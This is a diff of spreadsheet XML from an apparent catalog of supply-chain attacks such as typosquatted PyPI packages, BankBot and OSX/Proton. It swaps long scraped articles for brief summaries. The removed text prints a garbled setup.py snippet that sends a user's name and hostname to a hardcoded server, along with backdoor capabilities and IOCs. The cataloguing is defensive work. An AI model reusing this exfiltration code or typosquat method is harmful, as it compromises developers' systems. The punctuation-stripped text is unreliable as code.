-          <t>menu toggle navigation kontakty textová verzia grafická verzia english hľadaj wwwslovenskosk wwwskcertsk aktuality úrad ochrana utajovaných skutočností šifrová ochrana informácií dôveryhodné služby kybernetická bezpečnosť skcsirtsa20170909pypi skcsirt advisory advisory skcsirtsa20170909pypimaliciouscode first published version none affected platforms python versions incl windows linux severity medium fake software packages code execution benign malware summary skcsirt identified malicious software libraries official python package repository pypi posing well known libraries prominent example fake package urllib1211targz based upon well known package urllib31211targz packages downloaded unwitting developer administrator various means including popular “pip” utility install urllib evidence fake packages indeed downloaded incorporated software multiple times june september description copies several well known python packages published slightly modified names official python package repository pypi prominent example includes urllib urrlib3 bzip bzip2 packages contain exact code upstream package thus functionality installation script setuppy modified include malicious relatively benign code list fake package names acqusition uploaded impersonates acquisition apidevcoop uploaded impersonates apidevcoopcms bzip uploaded impersonates bz2file crypt uploaded impersonates crypto djangoserver uploaded impersonates djangoserverguardianapi uploaded impersonates pwdhash setuptools uploaded impersonates setuptools telnet uploaded impersonates telnetsrvlib urlib3 uploaded impersonates urllib3 urllib uploaded impersonates urllib3 malicious code added fake package executed soon developer system administrator installs package often done administrator privileges executed code identified samples used report following information using http request remote server http12142217448080 name version fake package user name user installs package hostname clear text data look like yurllib1211 admin testmachine data obfuscated using hardcoded password base64 encoded server address port obfuscated code evidence fake packages downloaded incorporated software multiple times june september coding style added code snipplet appendix makes incompatible python troubles installing packages python reported internet multiple times knowledge never identified incident success attack relies negligence developer system administrator check name package thoroughly attack made easier “pip” tool requiring cryptographic signature executing arbitrary code package installation well documented bugfeature also easy publish arbitrary python code pypi repository quality assurance code review process actions taken contacted administrators pypi repository identified packages taken immediately however remove fake packages servers already installed recomendations remove unintentionally installed fake packages check whether packages installed system execute following command list formatlegacy egrep acqusitionapidevcoopbzipcryptdjangoserverpwdsetuptoolstelneturlib3urllib command displays least package remove either using uninstall package removing system directory firectly latter option provides safety running potential malicious code process removal install proper package instead safer python development take great care installing python package executes code downloaded internet especially take great care installing unknown untrusted package pypi packages subject code review existing source code class names remained need modify source code used fake packages soon proper package installed code continue working expected indicators compromise connections port contact address suggests someone network installed fake package 93ec90693ef461d7f1e6f55b14cf47d9 1ac5a57d9b1c5525e27b4cbd5e254db1 1d0eaf4be1147da84e9069fff2e75629 80e114a73440a76c8d363f03a256a7a2 a1b460d52cfdee4e6193a9363c95c537 c68880e38bc514471cfb0b2226380bfd 57fed189bd50ffc95bbc3ca38670834b 9d944888b4072ae0eb71233b5d3d837a b389410f6fa9084fa63ccef153fa243c d4a9c4fb93306ebd7a6968ff2c503d17 httpspypipythonorgpackages5fd2e1b040d127dba93b94fe89065233cfb79f8c470d928e1287fb5a599fa230acqusition442targz httpspypipythonorgpackagese300b94399b2fbe768c478747bd8a23c325ea2abfa4f437d9c3e4f5b9035887capidevcoop1226targz httpspypipythonorgpackages7debcee775effde4e970da49d6468b70d2416fe5a08e11e19a522f53d5743811bzip098targz httpspypipythonorgpackagescae0b5f7810a1ad037f7afe810ed47a12c9ac44f52ac42e12e81f3ef7051352dcrypt141targz httpspypipythonorgpackages4eb16590c58d3ef19f68d6c60433e003bbeebf19f0281bb1174a32cbfee3c816djangoserver012targz httpspypipythonorgpackages55b4eb2a24496bab26ffa704a2a4f8d0eb827d360493d66d54f8208784f3d069pwd013targz httpspypipythonorgpackages8408c01703c62d4eda7ae0c38deeb8adb864d0c90367a4c3e4299b917ac88a39setuptools3601zip httpspypipythonorgpackagesc0b6ff36a55c6058aaf89451eacd5032c9ff12d6afacd08a21a3730195f2c43atelnet04targz httpspypipythonorgpackages754edcbcdb390752270dd52f93a2402e1092141b44d8359617da5539574283d4urlib31211targz httpspypipythonorgpackagesda977ed06ae96106088e13e88fd6f91c17fb58786d705b851f82c991664b08dburllib1211targz installed packages containing names list description recomendations appendix malicious code snipplet malicious code identified samples follows import import import socket import base64 soft osgetcwdsplit1 pwdgetpwuidosgetuidpwname hname socketgethostname rawd ssoft hname encd t0x760x210xfe0xcc0xee xrangelenrawd encd chrordrawdi tilent p11rnbase64b64encodeencd socketsocketsocketafinet socketsockstream ssettimeout4 tixl jqyl sconnectbase64b64decoderip ssendallp sclose except exceptione welcome harm pass dátum prvého uverejnenia posledná aktualizácia neprehliadnite neprehliadnite správne poplatky apríla januára mení režim niektoré novo podané žiadosti dotazník znalostiam povinnostiach kybernetickej bezpečnosti uznanie bezpečnostnej previerky vykonanej zahraničí akceptovanie okrem kvalifikovaného elektronického podpisu zdokonalený elektronický podpis založený kvalifikovanom certifikáte žiadosť vykonanie bezpečnostnej previerky metodické usmernenie samohodnotenie účinnosti prijatých bezpečnostných opatrení zmysle zákona kybernetickej bezpečnosti voľné pracovné pozície jednotný informačný systém formuláre prevádzkovateľov základnej služby audit kybernetickej bezpečnosti formulár hlásenie incidentov copyright všetky práva vyhradené posledná aktualizácia mapa stránok súbory cookies vyhlásenie prístupnosti technická podpora kontakty</t>
+          <t>10 instances of typosquatting attacks that collect and exfiltrate host information were identified.</t>
         </is>
       </c>
       <c r="D50" t="inlineStr">
         <is>
           <t>https://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/</t>
-        </is>
-      </c>
-      <c r="E50" t="inlineStr">
-        <is>
-          <t>['advisory', 'advisory', 'version', 'none', 'platform', 'python', 'version', 'medium', 'fake', 'software', 'package', 'code', 'execution', 'benign', 'malware', 'summary', 'malicious', 'software', 'library', 'official', 'python', 'package', 'repository', 'library', 'prominent', 'example', 'fake', 'package', 'package', 'urllib31211targz', 'package', 'developer', 'administrator', 'various', 'mean', 'popular', 'utility', 'urllib', 'evidence', 'fake', 'package', 'incorporated', 'software', 'multiple', 'time', 'description', 'copy', 'several', 'python', 'package', 'name', 'official', 'python', 'package', 'repository', 'prominent', 'example', 'bzip2', 'package', 'exact', 'code', 'upstream', 'package', 'functionality', 'installation', 'script', 'setuppy', 'malicious', 'benign', 'code', 'list', 'fake', 'package', 'name', 'impersonate', 'bz2file', 'impersonate', 'impersonate', 'impersonate', 'pwdhash', 'impersonate', 'setuptool', 'impersonate', 'impersonate', 'impersonate', 'fake', 'package', 'developer', 'system', 'administrator', 'package', 'administrator', 'privilege', 'code', 'sample', 'report', 'information', 'http', 'request', 'remote', 'server', 'name', 'version', 'fake', 'package', 'user', 'name', 'user', 'package', 'hostname', 'clear', 'text', 'datum', 'admin', 'password', 'base64', 'server', 'address', 'port', 'code', 'evidence', 'fake', 'package', 'incorporated', 'software', 'multiple', 'time', 'style', 'incompatible', 'python', 'trouble', 'package', 'internet', 'multiple', 'time', 'knowledge', 'incident', 'success', 'attack', 'negligence', 'developer', 'system', 'administrator', 'name', 'package', 'easy', 'tool', 'cryptographic', 'signature', 'arbitrary', 'code', 'package', 'installation', 'bugfeature', 'arbitrary', 'python', 'code', 'quality', 'assurance', 'code', 'review', 'process', 'action', 'contacted', 'administrator', 'package', 'fake', 'package', 'server', 'recomendation', 'fake', 'package', 'package', 'system', 'command', 'list', 'formatlegacy', 'acqusitionapidevcoopbzipcryptdjangoserverpwdsetuptoolstelneturlib3urllib', 'command', 'display', 'least', 'uninstall', 'package', 'system', 'directory', 'latter', 'option', 'safety', 'potential', 'malicious', 'code', 'process', 'removal', 'proper', 'package', 'safe', 'python', 'development', 'great', 'care', 'python', 'package', 'code', 'internet', 'great', 'care', 'unknown', 'untrusted', 'package', 'pypi', 'package', 'subject', 'code', 'review', 'source', 'code', 'class', 'name', 'source', 'code', 'fake', 'package', 'proper', 'package', 'code', 'indicator', 'connection', 'port', 'contact', 'address', 'network', 'fake', 'package', 'package', 'name', 'list', 'description', 'recomendation', 'malicious', 'code', 'sample', 'import', 'import', 'import', 'socket', 'import', 'base64', 'socketsockstream', 'ssettimeout4', 'tixl', 'ssendallp', 'sclose', 'exceptione', 'welcome', 'harm', 'prevádzkovateľov', 'incidentov', 'práva', 'súbory', 'cookie']</t>
         </is>
       </c>
     </row>
@@ -1763,7 +1553,11 @@
           <t>CCleaner</t>
         </is>
       </c>
-      <c r="C51" t="inlineStr"/>
+      <c r="C51" t="inlineStr">
+        <is>
+          <t>Developer workstations were compromised to intrgrate  ShadowPad malware into the CCleaner build process, allowing distribution of the malware using the legitimate signed version of CCleaner.</t>
+        </is>
+      </c>
       <c r="D51" t="inlineStr">
         <is>
           <t>https://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
@@ -1771,11 +1565,6 @@
 https://www.ccleaner.com/news/blog/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users</t>
         </is>
       </c>
-      <c r="E51" t="inlineStr">
-        <is>
-          <t>[]</t>
-        </is>
-      </c>
     </row>
     <row r="52">
       <c r="A52" t="inlineStr">
@@ -1788,15 +1577,14 @@
           <t>Lovely Wallpaper</t>
         </is>
       </c>
-      <c r="C52" t="inlineStr"/>
+      <c r="C52" t="inlineStr">
+        <is>
+          <t>Malware injected in a free Android app would secretly register victims for paid services. The malicious code in the app came from a compromised software development kit (SDK) that Android developers used.</t>
+        </is>
+      </c>
       <c r="D52" t="inlineStr">
         <is>
           <t>https://research.checkpoint.com/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/</t>
-        </is>
-      </c>
-      <c r="E52" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -1811,15 +1599,14 @@
           <t>Chrome Web Store</t>
         </is>
       </c>
-      <c r="C53" t="inlineStr"/>
+      <c r="C53" t="inlineStr">
+        <is>
+          <t>SafeBrowse malicious browser extension runs a crypto mining module in the background</t>
+        </is>
+      </c>
       <c r="D53" t="inlineStr">
         <is>
           <t>https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected</t>
-        </is>
-      </c>
-      <c r="E53" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -1834,15 +1621,14 @@
           <t>Chrome Web Store</t>
         </is>
       </c>
-      <c r="C54" t="inlineStr"/>
+      <c r="C54" t="inlineStr">
+        <is>
+          <t>Steam Inventory Helper browser extension monitors browsing activity</t>
+        </is>
+      </c>
       <c r="D54" t="inlineStr">
         <is>
           <t>https://www.ghacks.net/2017/09/19/steam-inventory-helper-monitors-your-browsing-activity</t>
-        </is>
-      </c>
-      <c r="E54" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -1859,17 +1645,12 @@
       </c>
       <c r="C55" t="inlineStr">
         <is>
-          <t>awardwinning news views insight eset community english español deutsch português français tips advice business eset research eset research blogposts podcasts white papers reports featured ukraine crisis digital resource center live progress covid19 resources videos topics digital scams privacy cybercrime kids online social media internet things malware ransomware secure coding mobile critical infrastructure research welivesecurity experts contact english español deutsch português français awardwinning news views insight eset community eset research mobile bankbot trojan returns google play tricks android banking trojan first informed beginning year found google play contains tricks designed access private banking information user lukas stefanko read dangerous android banking trojan first reported beginning found google play stealthier ever subsequently dubbed bankbot banking trojan evolving throughout year resurfacing different versions outside google play variant discovered google play september first successfully combine recent steps bankbot’s evolution improved code obfuscation sophisticated payload dropping functionality cunning infection mechanism abusing android’s accessibility service misuse android accessibility previously observed number different trojans mostly outside google play recent analyses sfylabs zscaler confirmed crooks spreading bankbot managed upload accessibilityabusing functionality google play without banking malware payload “complete puzzle” featuring banking malware payload managed sneak google play masqueraded game named jewels star classic important note attackers misused name popular legitimate game series jewels star developer itreegamer connected malicious campaign notified google’s team malicious installed users getting removed store operate unsuspecting user downloads jewels star classic developer gamedevtony functioning android game hidden extras banking malware payload lurking inside game’s resources malicious service waiting triggered preset delay figure malicious discovered google play malicious service triggered minutes first execution jewels star classic infected device shows alert prompting user enable something named “google service” note malicious alert appears independent user’s current activity apparent connection game clicking stop alert appearing user taken android accessibility menu services accessibility functions managed among legitimate ones service named “google service” listed created malware clicking displays description taken google’s original terms service figure alert prompting user enable “google service” figure “google service” listed among android accessibility services figure description malicious service taken google’s terms service user decides activate service list required permissions displayed observe actions retrieve window content turn explore touch turn enhanced accessibility perform gestures clicking grants accessibility permissions malware’s accessibility service granting permissions user gives malware free hand almost literally carry tasks needs continue malicious activity figure permissions required activation “google service” practice accepting permissions user briefly denied access screen “google service update” needless initiated google running foreground figure screen covering malicious activity malware uses screen cover next steps clicking user’s behalf using previously obtained accessibility permissions user waits fictitious update load malware carries following tasks allow installing apps unknown sources install bankbot assets launch activate device administrator bankbot bankbot default messaging obtain permission draw apps tasks successfully carried malware start working towards next goal stealing victim’s credit card details opposed bankbot variants target extensive list specific banking applications impersonate login forms order harvest entered credentials focuses exclusively google play android users preinstalled devices user launches google play bankbot steps overlays legitimate fake form requesting user’s credit card detailsfig figure fake form requesting user’s credit card details users fall fake form enter credit card details attackers essentially thanks bankbot setting default messaging intercept communication going infected device enables attackers bypass smsbased twofactor authentication victim’s bank account last potential obstacle victim’s money makes dangerous campaign crooks together techniques rising popularity among android malware authors abusing android accessibility service impersonating google setting timer delaying onset malicious activity evade google’s measures techniques combined make difficult victim recognize time malware impersonates google waits minutes displaying first alert victim little chance connect activity jewel star classic they’ve recently downloaded many different names malware uses throughout infection process significantly complicate efforts locate manually remove clean infected device you’re downloading many different apps google play elsewhere might want check haven’t reached malware checking device jewels star classic enough attackers frequently change apps misused bankbot’s distribution device infected recommend look following indicators presence named “google update” shown found settings application managerapps google update active device administrator named “system update” shown found settings device administrators repeated appearance “google service” alert shown fig2 figure malicious apps application manager figure bankbot disguised system update active device administrators find mentioned indicators device well infected bankbot variant manually clean device would first need disable device administrator rights “system update” proceed uninstalling “google update” associated trojanized however finding trojanized started infection like case jewels star classic tricky minute delay malicious activity well fact works expected detect remove components recommend using reliable mobile solution eset products detect block variant bankbot androidspybankerla stay safe besides using reliable mobile solution things avoid falling victim mobile malware whenever possible favor official stores alternative ones although flawless google play employ advanced mechanisms doesn’t case alternative stores doubt installing check popularity number installs ratings content reviews running anything you’ve installed mobile device attention permissions rights requests asks intrusive permissions even accessibilityrelated read caution grant absolutely sure app’s reliability bankbot first detected eset december first analyzed drweb bankbot remotely controlled android banking trojan capable harvesting banking details using phony login forms number apps intercepting text messages order bypass 2factorauthentication displaying unsolicited push notifications shortly discovery apps trojanized bankbot google play beginning confirmed malicious apps derived source code made public underground forums december public availability code surge number sophistication mobile banking trojans analyzed sample iocs package name hash commygamejewelsclassicapp b556fb1282578ffacdbf2126480a7c221e610f2f comw8fjgwopjmvngfesapp 4d3e3e7a1747cf845d21ec5e9f20f399d491c724 keep date sign newsletters ukraine crisis newsletter regular weekly newsletter subscribe related articles eset research rescoms rides waves acecryptor spam eset research rescoms rides waves acecryptor spam eset research evasive panda leverages monlam festival target tibetans eset research evasive panda leverages monlam festival target tibetans eset research ukraine crisis digital resource center operation texonto information operation targeting ukrainian speakers context eset research ukraine crisis digital resource center operation texonto information operation targeting ukrainian speakers context share article discussion awardwinning news views insight eset community eset contact privacy policy legal information manage cookies feed copyright eset rights reserved</t>
+          <t>Another instance of the BankBot trojan was identified within an app on the Google Play Store.</t>
         </is>
       </c>
       <c r="D55" t="inlineStr">
         <is>
           <t>https://www.welivesecurity.com/2017/09/25/banking-trojan-returns-google-play/</t>
-        </is>
-      </c>
-      <c r="E55" t="inlineStr">
-        <is>
-          <t>['news', 'view', 'insight', 'advice', 'business', 'research', 'blogpost', 'podcast', 'white', 'paper', 'report', 'crisis', 'digital', 'resource', 'center', 'live', 'progress', 'covid19', 'resource', 'video', 'digital', 'cybercrime', 'online', 'social', 'medium', 'internet', 'thing', 'malware', 'ransomware', 'mobile', 'critical', 'infrastructure', 'research', 'welivesecurity', 'expert', 'contact', 'news', 'view', 'insight', 'play', 'trick', 'beginning', 'year', 'play', 'trick', 'access', 'private', 'banking', 'information', 'user', 'dangerous', 'banking', 'stealthy', 'year', 'different', 'version', 'play', 'variant', 'play', 'recent', 'step', 'evolution', 'code', 'obfuscation', 'sophisticated', 'payload', 'functionality', 'infection', 'mechanism', 'accessibility', 'service', 'misuse', 'android', 'accessibility', 'number', 'different', 'trojan', 'recent', 'analysis', 'sfylab', 'crook', 'upload', 'functionality', 'play', 'banking', 'complete', 'puzzle', 'banking', 'play', 'masqueraded', 'game', 'jewel', 'star', 'classic', 'important', 'note', 'attacker', 'name', 'popular', 'legitimate', 'game', 'series', 'connected', 'malicious', 'campaign', 'team', 'malicious', 'user', 'store', 'unsuspecting', 'user', 'classic', 'developer', 'gamedevtony', 'game', 'resource', 'malicious', 'service', 'preset', 'delay', 'malicious', 'google', 'malicious', 'service', 'minute', 'first', 'execution', 'star', 'classic', 'device', 'alert', 'user', 'service', 'malicious', 'alert', 'independent', 'user', 'current', 'activity', 'apparent', 'connection', 'game', 'clicking', 'alert', 'user', 'accessibility', 'menu', 'service', 'accessibility', 'function', 'legitimate', 'one', 'service', 'service', 'malware', 'clicking', 'display', 'description', 'original', 'term', 'service', 'figure', 'alert', 'user', 'service', 'figure', 'service', 'accessibility', 'service', 'figure', 'description', 'malicious', 'service', 'term', 'service', 'user', 'service', 'list', 'permission', 'observe', 'action', 'window', 'content', 'touch', 'turn', 'accessibility', 'gesture', 'grant', 'accessibility', 'permission', 'accessibility', 'service', 'permission', 'user', 'malware', 'free', 'hand', 'task', 'need', 'malicious', 'activity', 'figure', 'permission', 'activation', 'service', 'practice', 'permission', 'user', 'access', 'screen', 'update', 'needless', 'foreground', 'figure', 'screen', 'malicious', 'activity', 'malware', 'screen', 'next', 'step', 'user', 'behalf', 'accessibility', 'permission', 'user', 'fictitious', 'update', 'load', 'malware', 'task', 'app', 'unknown', 'source', 'device', 'permission', 'app', 'task', 'malware', 'next', 'goal', 'victim', 'credit', 'card', 'detail', 'extensive', 'list', 'specific', 'banking', 'application', 'impersonate', 'login', 'form', 'order', 'harvest', 'credential', 'user', 'device', 'user', 'step', 'overlay', 'fake', 'form', 'user', 'credit', 'card', 'detailsfig', 'figure', 'fake', 'form', 'user', 'credit', 'card', 'detail', 'user', 'fake', 'form', 'credit', 'card', 'detail', 'attacker', 'default', 'intercept', 'communication', 'device', 'attacker', 'bypass', 'twofactor', 'authentication', 'victim', 'bank', 'account', 'last', 'potential', 'obstacle', 'victim', 'money', 'dangerous', 'campaign', 'crook', 'technique', 'popularity', 'author', 'accessibility', 'service', 'timer', 'onset', 'malicious', 'activity', 'measure', 'technique', 'difficult', 'victim', 'time', 'minute', 'first', 'alert', 'victim', 'little', 'chance', 'activity', 'jewel', 'star', 'classic', 'many', 'different', 'name', 'infection', 'process', 'effort', 'clean', 'device', 'many', 'different', 'app', 'google', 'play', 'malware', 'device', 'jewel', 'star', 'classic', 'enough', 'attacker', 'app', 'distribution', 'device', 'indicator', 'presence', 'update', 'setting', 'application', 'active', 'device', 'administrator', 'system', 'update', 'setting', 'device', 'administrator', 'appearance', 'service', 'alert', 'fig2', 'figure', 'malicious', 'app', 'application', 'manager', 'figure', 'system', 'active', 'device', 'administrator', 'indicator', 'device', 'bankbot', 'variant', 'clean', 'device', 'disable', 'device', 'administrator', 'right', 'system', 'update', 'update', 'infection', 'case', 'jewel', 'star', 'classic', 'tricky', 'minute', 'delay', 'malicious', 'activity', 'fact', 'work', 'remove', 'component', 'reliable', 'mobile', 'solution', 'eset', 'product', 'block', 'variant', 'bankbot', 'safe', 'reliable', 'mobile', 'solution', 'thing', 'victim', 'mobile', 'malware', 'possible', 'official', 'store', 'alternative', 'one', 'flawless', 'google', 'play', 'advanced', 'mechanism', 'alternative', 'store', 'check', 'popularity', 'number', 'rating', 'content', 'review', 'mobile', 'device', 'attention', 'permission', 'right', 'request', 'intrusive', 'permission', 'read', 'caution', 'grant', 'sure', 'app', 'reliability', 'capable', 'banking', 'detail', 'phony', 'login', 'form', 'number', 'app', 'text', 'message', 'order', 'unsolicited', 'push', 'notification', 'discovery', 'app', 'play', 'malicious', 'app', 'source', 'code', 'public', 'underground', 'forum', 'public', 'availability', 'code', 'surge', 'number', 'sophistication', 'mobile', 'banking', 'trojan', 'sample', 'package', 'name', 'hash', 'date', 'newsletter', 'regular', 'weekly', 'newsletter', 'subscribe', 'article', 'research', 'rescom', 'ride', 'wave', 'rescom', 'ride', 'wave', 'evasive', 'panda', 'leverage', 'research', 'evasive', 'panda', 'leverage', 'crisis', 'digital', 'resource', 'operation', 'ukrainian', 'speaker', 'context', 'crisis', 'digital', 'resource', 'operation', 'ukrainian', 'speaker', 'context', 'share', 'article', 'discussion', 'news', 'view', 'insight', 'privacy', 'policy', 'legal', 'information', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -1886,17 +1667,12 @@
       </c>
       <c r="C56" t="inlineStr">
         <is>
-          <t>awardwinning news views insight eset community english español deutsch português français tips advice business eset research eset research blogposts podcasts white papers reports featured ukraine crisis digital resource center live progress covid19 resources videos topics digital scams privacy cybercrime kids online social media internet things malware ransomware secure coding mobile critical infrastructure research welivesecurity experts contact english español deutsch português français awardwinning news views insight eset community eset research osxproton spreading supplychain attack researchers noticed makers elmedia player software distributing version trojanized osxproton malware eset research read october eset researchers noticed eltima makers elmedia player software distributing version application trojanized osxproton malware official website eset contacted eltima soon situation confirmed eltima responsive maintained excellent communication throughout incident timeline trojanized package confirmed 1035am eltima informed email 225pm eltima acknowledged issue initiated remediation efforts 310pm eltima confirms infrastructure cleaned serving legitimate applications 1012am eltima publishes announcement event 1215pm added references folx also distributed proton malware note blog initially posted despite research incomplete hence information preliminary blogpost updated facts emerge compromised eset advises anyone downloaded elmedia player folx software recently verify system compromised testing presence following files directories tmpupdaterapp librarylaunchagentscomeltimaupdateragentplist libraryrand libraryrandupdateragentapp exists means trojanized elmedia player folx application executed osxproton likely running downloaded software october 19th 315pm likely compromised know trojanized version application downloadable eltima website october builtin automatic update mechanism seems unaffected malicious payload compromised system osxproton backdoor extensive datastealing capabilities gains persistence system steal following operating system details hardware serial number ioplatformserialnumber full name current user hostname system integrity protection status csrutil status gateway information route default gateway print current time timezone browser information chrome safari opera firefox history cookies bookmarks login data cryptocurrency wallets electrum electrumwallets bitcoin core libraryapplication supportbitcoinwalletdat armory libraryapplication supportarmory private data entire content macos keychain data using modified version chainbreaker tunnelblick configuration libraryapplication supporttunnelblickconfigurations gnupg data gnupg 1password data libraryapplication support1password libraryapplication support1password list installed applications clean system compromise administrator account full reinstall sure malware victims also assume least secrets outlined previous section compromised take appropriate measures invalidate supplychain attack revisited last year bittorrent client transmission abused twice spread malware first osxkeranger ransomware followed osxkeydnap password stealer year handbrake videotranscoder application found bundled osxproton today eset discovered another popular software package used spread osxproton elmedia player media player reached users milestone summer width640 height722 technical analysis osxproton remote access trojan sold underground forums briefly documented sixgill earlier year analyzed thomas reed malwarebytes amit serper cyberreason patrick wardle objectivesee current case eltima trojanized software attacker built signed wrapper around legitimate elmedia player proton fact observed seems realtime repackaging signing wrappers valid apple developer history currently known samples eltima eset confirmed working apple invalidate developer used sign malicious application apple revoked certificate timestamps timezone clean application timestamp developper sha1 timestampjul authoritydeveloper application eltima n7u4hgp254 0603353852e174fc0337642e3957c7423f182a8c trojanized application timestamp developper sha1 file timestampoct authoritydeveloper application clifton grimm 9h35wm5ta5 e9dcdae1406ab1132dc9d507fd63503e5c4d41d9 timestampoct authoritydeveloper application clifton grimm 9h35wm5ta5 8cfa551d15320f0157ece3bdf30b1c62765a93a5 timestampoct authoritydeveloper application clifton grimm 9h35wm5ta5 0400b35d703d872adc64aa7ef914a260903998ca first wrapper launches real elmedia player application stored resources folder application finally extracts launches osxproton seen previous cases osxproton shows fake authorization window gain root privileges persistance osxproton ensures persistence adding launchagent users administrator types password creates following files system librarylaunchagentscomeltimaupdateragentplist libraryrandupdateragentapp plutil librarylaunchagentscomeltimaupdateragentplist programarguments libraryrandupdateragentappcontentsmacosupdateragent keepalive runatload label comeltimaupdateragent backdoor commands mentioned beginning post osxproton backdoor extensive information stealing capabilities backdoor component observed supports following commands archive archive files using copy copy file locally create create directory file locally delete delete file locally download download file filesearch search files executes find iname devnull forceupdate selfupdate digital signature validation phonehome remoteexecute execute binary file inside file given shell command tunnel create tunnel using port upload upload file server server proton uses domain mimics legitimate eltima domain consistent handbrake case legitimate domain proton domain eltima eltimacom eltimain handbrake handbrakefr handbrakestorecom handbrakecc iocs distributing trojanized application time discovery hxxpsmaceltimacomdownloadelmediaplayerdmg hxxpwwwelmediavideoplayercomdownloadelmediaplayerdmg hxxpsmaceltimacomdownloaddownloadermacdmg servers eltimain domain registered hashes path sha1 eset detection name description elmedia playerappcontentsresourcesplzip 9e5378165bb20e9a7f74a7fcc73b528f7b231a75 multiple threats archive proton malware python scripts 10a09c09fd5dd76202e308718a357abc7de291b5 multiple threats archive proton malware python scripts elmedia playerappcontentsmacoselmedia player c9472d791c076a10dce5ff0d3ab6e7706524b741 osxprotond launcher wrapper 30d77908ac9d37c4c14d32ea3e0b8df4c7e75464 osxprotond launcher wrapper updaterappcontentsmacosupdater 3ef34e2581937babd2b7ce63ab1d92cd9440181a osxprotonc proton malware signed ef5a11a1bb5b2423554309688aa7947f4afa5388 osxprotonc proton malware signed michal malik anton cherepanov marcétienne léveillé thomas dupuy alexis doraisjoncas work investigation keep date sign newsletters ukraine crisis newsletter regular weekly newsletter subscribe related articles eset research rescoms rides waves acecryptor spam eset research rescoms rides waves acecryptor spam eset research evasive panda leverages monlam festival target tibetans eset research evasive panda leverages monlam festival target tibetans eset research ukraine crisis digital resource center operation texonto information operation targeting ukrainian speakers context eset research ukraine crisis digital resource center operation texonto information operation targeting ukrainian speakers context share article discussion awardwinning news views insight eset community eset contact privacy policy legal information manage cookies feed copyright eset rights reserved</t>
+          <t>Folx and Elmedia Player installers were distributed with malware from the company's offical release servers.</t>
         </is>
       </c>
       <c r="D56" t="inlineStr">
         <is>
           <t>https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/</t>
-        </is>
-      </c>
-      <c r="E56" t="inlineStr">
-        <is>
-          <t>['news', 'view', 'insight', 'advice', 'business', 'research', 'blogpost', 'podcast', 'white', 'paper', 'report', 'crisis', 'digital', 'resource', 'center', 'live', 'progress', 'covid19', 'resource', 'video', 'digital', 'cybercrime', 'online', 'social', 'medium', 'internet', 'thing', 'malware', 'ransomware', 'mobile', 'critical', 'infrastructure', 'research', 'welivesecurity', 'expert', 'contact', 'news', 'view', 'insight', 'supplychain', 'attack', 'researcher', 'maker', 'player', 'software', 'version', 'eset', 'researcher', 'eltima', 'maker', 'player', 'software', 'version', 'application', 'website', 'situation', 'excellent', 'communication', 'incident', 'timeline', 'package', '1035am', 'email', 'issue', 'remediation', 'effort', '310pm', 'infrastructure', 'legitimate', 'application', '1012am', 'eltima', 'announcement', 'event', '1215pm', 'reference', 'proton', 'malware', 'note', 'blog', 'research', 'incomplete', 'information', 'preliminary', 'blogpost', 'fact', 'player', 'software', 'system', 'testing', 'presence', 'file', 'player', 'folx', 'application', 'software', '19th', '315pm', 'know', 'version', 'application', 'downloadable', 'eltima', 'website', 'automatic', 'update', 'mechanism', 'unaffected', 'malicious', 'payload', 'system', 'osxproton', 'backdoor', 'extensive', 'datastealing', 'capability', 'persistence', 'system', 'steal', 'operating', 'system', 'hardware', 'serial', 'number', 'ioplatformserialnumber', 'full', 'name', 'current', 'user', 'hostname', 'system', 'integrity', 'protection', 'status', 'status', 'gateway', 'information', 'route', 'default', 'gateway', 'print', 'current', 'time', 'timezone', 'opera', 'history', 'cookie', 'bookmark', 'login', 'datum', 'cryptocurrency', 'wallet', 'electrum', 'electrumwallet', 'bitcoin', 'core', 'libraryapplication', 'supportbitcoinwalletdat', 'libraryapplication', 'supportarmory', 'private', 'data', 'entire', 'datum', 'version', 'libraryapplication', 'supporttunnelblickconfiguration', 'gnupg', 'datum', 'gnupg', 'datum', 'libraryapplication', 'list', 'application', 'clean', 'system', 'compromise', 'administrator', 'account', 'full', 'reinstall', 'sure', 'malware', 'victim', 'least', 'secret', 'previous', 'section', 'appropriate', 'measure', 'supplychain', 'attack', 'last', 'year', 'client', 'transmission', 'spread', 'malware', 'ransomware', 'osxkeydnap', 'password', 'stealer', 'year', 'handbrake', 'videotranscoder', 'application', 'today', 'popular', 'software', 'package', 'player', 'medium', 'player', 'user', 'milestone', 'summer', 'height722', 'technical', 'analysis', 'remote', 'underground', 'forum', 'sixgill', 'year', 'current', 'case', 'software', 'attacker', 'wrapper', 'legitimate', 'elmedia', 'player', 'proton', 'fact', 'realtime', 'signing', 'wrapper', 'valid', 'apple', 'developer', 'history', 'sample', 'apple', 'developer', 'sign', 'malicious', 'application', 'apple', 'certificate', 'timestamp', 'timezone', 'clean', 'application', 'authoritydeveloper', 'application', 'application', 'wrapper', 'real', 'elmedia', 'player', 'application', 'resource', 'folder', 'application', 'launch', 'previous', 'case', 'fake', 'authorization', 'window', 'gain', 'root', 'privilege', 'persistance', 'persistence', 'launchagent', 'user', 'administrator', 'type', 'password', 'file', 'system', 'librarylaunchagentscomeltimaupdateragentplist', 'programargument', 'label', 'comeltimaupdateragent', 'backdoor', 'command', 'backdoor', 'extensive', 'information', 'capability', 'backdoor', 'component', 'support', 'command', 'archive', 'archive', 'file', 'copy', 'copy', 'file', 'directory', 'file', 'delete', 'delete', 'file', 'download', 'download', 'file', 'filesearch', 'search', 'file', 'devnull', 'forceupdate', 'selfupdate', 'digital', 'signature', 'phonehome', 'binary', 'file', 'file', 'shell', 'command', 'tunnel', 'tunnel', 'port', 'upload', 'upload', 'file', 'server', 'server', 'domain', 'legitimate', 'eltima', 'domain', 'consistent', 'handbrake', 'case', 'legitimate', 'domain', 'proton', 'domain', 'application', 'time', 'server', 'domain', 'hash', 'detection', 'name', 'description', 'multiple', 'threat', 'archive', 'proton', 'malware', 'script', 'multiple', 'threat', 'archive', 'proton', 'malware', 'script', 'playerappcontentsmacoselmedia', 'player', 'updaterappcontentsmacosupdater', 'osxprotonc', 